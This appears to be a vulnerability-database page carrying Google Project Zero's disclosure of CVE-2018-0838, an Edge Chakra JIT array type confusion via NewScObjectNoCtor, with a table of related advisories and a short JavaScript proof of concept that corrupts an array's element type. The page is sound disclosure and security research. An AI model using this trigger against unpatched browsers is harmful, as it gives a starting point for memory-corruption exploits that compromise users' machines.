Microsoft Edge Chakra JIT Array Type Confusion via NewScObjectNoCto
Reporter | Title | Published | Views | Family All 106 |
---|---|---|---|---|
![]() | Microsoft Edge Scripting Engine CVE-2018-0838 Remote Memory Corruption Vulnerability | 13 Feb 201800:00 | â | symantec |
![]() | Microsoft Edge Chakra JIT - NewScObjectNoCtor Array Type Confusion Exploit | 15 Feb 201800:00 | â | zdt |
![]() | Microsoft Edge Scripting Engine Memory Corruption (CVE-2018-0838) | 13 Feb 201800:00 | â | checkpoint_advisories |
![]() | Scripting Engine Memory Corruption Vulnerability | 13 Feb 201808:00 | â | mscve |
![]() | CVE-2018-0838 | 15 Feb 201802:29 | â | cve |
![]() | CVE-2018-0858 | 15 Feb 201802:29 | â | cve |
![]() | CVE-2018-0836 | 15 Feb 201802:29 | â | cve |
![]() | CVE-2018-0837 | 15 Feb 201802:29 | â | cve |
![]() | CVE-2018-0859 | 15 Feb 201802:29 | â | cve |
![]() | CVE-2018-0861 | 15 Feb 201802:29 | â | cve |
`Microsoft Edge: Chakra: JIT: Array type confusion via NewScObjectNoCtor
CVE-2018-0838
This is similar to the previous issues 1457, <a href="/p/project-zero/issues/detail?id=1459" title="Microsoft Edge: Chakra: JIT: Array type confusion via Array.prototype.reverse" class="closed_ref" rel="nofollow"> 1459 </a>(MSRC 42551, MSRC 42552).
If a JavaScript function is used as a consturctor, it sets the new object's "__proto__" to its "prototype". The JIT compiler uses NewScObjectNoCtor instructions which are not checked by CheckJsArrayKills.
PoC:
function inlinee() {
}
function opt(arr) {
arr[0] = 1.1;
new inlinee();
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1];
for (let i = 0; i < 10000; i++) {
inlinee.prototype = {};
opt(arr);
}
inlinee.prototype = arr;
opt(arr);
print(arr);
}
main();
This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
Found by: lokihardt
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo